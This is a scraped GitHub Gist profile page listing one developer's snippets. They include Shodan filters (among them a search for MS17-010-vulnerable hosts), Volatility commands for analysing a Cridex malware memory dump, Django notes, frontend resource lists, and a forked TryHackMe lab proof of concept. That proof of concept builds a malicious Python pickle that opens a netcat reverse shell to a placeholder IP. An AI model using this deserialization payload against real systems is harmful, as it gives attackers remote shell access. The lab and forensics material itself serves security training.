Skip to content

Instantly share code, notes, and snippets.

View 1UC1F3R616's full-sized avatar
:shipit:
Attention is All You Need

Kush Choudhary 1UC1F3R616

:shipit:
Attention is All You Need
View GitHub Profile
  • ASN:AS14061
  • asn:AS14061 product:MySQL
  • Server: SQ-WEBCAM
  • vuln:ms17-010
  • Some Filters

    City
    Country
    Geo (coordinates)
 Hostname
.\volatility.exe -f cridex.vmem imageinfo
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 pslist
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 netscan
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 psxview
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 ldrmodules
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 apihooks
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 malfind -D cridex_dump
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 dlllist
.\volatility.exe -f .\cridex.vmem --profile=WinXPSP2x86 --pid=584 dlldump -D .\cridex_dump\
@1UC1F3R616
1UC1F3R616 / rce.py
Created August 28, 2020 14:03 — forked from CMNatic/cloudSettings
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))

django.admin

  • django-admin startproject ProjectName

manage.py

  • python manage.py runserver 0:8000
  • python manage.py startapp polls
  • python manage.py createsuperuser
  • python manage.py dbshell: Interactive DB Shell
  • python manage.py shell: Interactive Shell | ORM interaction | many more uses
  • pip install gunicorn
# gunicorn
# fastapi or flask or aiohttp or sarlette
# Django

# Model -> View -> Template -> Response
Python 27 mins β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–β–‘β–‘β–‘β–‘ 76.8%
Other 8 mins β–ˆβ–ˆβ–ˆβ–ˆβ–Šβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ 23.2%
🌞 Morning 51 commits β–ˆβ–ˆβ–ˆβ–ˆβ–Žβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ 20.3%
πŸŒ† Daytime 60 commits β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ 23.9%
πŸŒƒ Evening 73 commits β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ 29.1%
πŸŒ™ Night 67 commits β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–Œβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ 26.7%

Challanges with Microservices

  • Data Managment between Services (Database per service)
    • Sync Communication
    • Async Communication: 2 ways
@1UC1F3R616
1UC1F3R616 / Frontend-WebDev.md
Last active September 30, 2020 05:37
Add your favourites | ICONS | ILLUSTRATORS | CSS | JS | CDN | Framework | Frontend | Dedicated for frontend developers | Open Source

Frameworks

  • Semantic UI: Semantic empowers designers and developers by creating a shared vocabulary for UI
  • Bootstrap: Bootstrap is a free and open-source CSS framework directed at responsive, mobile-first front-end web development. It contains CSS- and JavaScript-based design templates for typography, forms, buttons, navigation, and other interface components
  • Material-UI: React components for faster and easier web development. Build your own design system, or start with Material Design

Illustrators

  • unDraw: Open-source illustrations for any idea you can imagine and create.
  • paid Iconscout: Get high-quality Icons, Illustrations and Stock photos at one place

Icons